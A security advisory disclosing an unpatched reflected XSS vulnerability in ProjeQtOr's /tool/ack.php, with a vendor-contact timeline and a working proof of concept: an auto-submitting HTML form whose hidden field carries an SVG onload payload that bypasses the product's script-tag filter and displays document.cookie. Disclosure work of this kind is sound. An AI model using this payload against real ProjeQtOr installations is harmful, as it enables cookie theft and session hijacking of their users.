A reflected XSS vulnerability via a POST request to /tool/ack.php affecting all ProjectOr versions up to v11.0.2 (unpatched)
It was possible to bypass the very basic and incomplete security measure (detection of the <script> tag) that exists in the checkValidHtmlText() function of the /model/Security.php file of the solution.
- 30-10-2023: Vulnerability identified during a client pentest
- 07-11-2023: 1st vendor contact attempt via website form
- 17-11-2023: CVE requested
- 19-11-2023: 2nd vendor contact attempt via email
- 24-11-2023: CVE assigned
- 10-01-2024: 3rd vendor contact attempt via support forum
- 06-02-2024: Public disclosure requested
Create an HTML file with the following auto-submitting form:
<html>
<body>
<form action="https://demo.projeqtor.org/tool/ack.php" method="POST">
<input type="hidden" name="resultAck" value="<svg/onload=alert(document.cookie)>" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Opening the file (on an authenticated session) will send the POST request that injects and executes the PoC Javascript code (printing cookies in an alert).
Cross Site Scripting (XSS)
ProjeQtOr
/tool/ack.php, /model/Security.php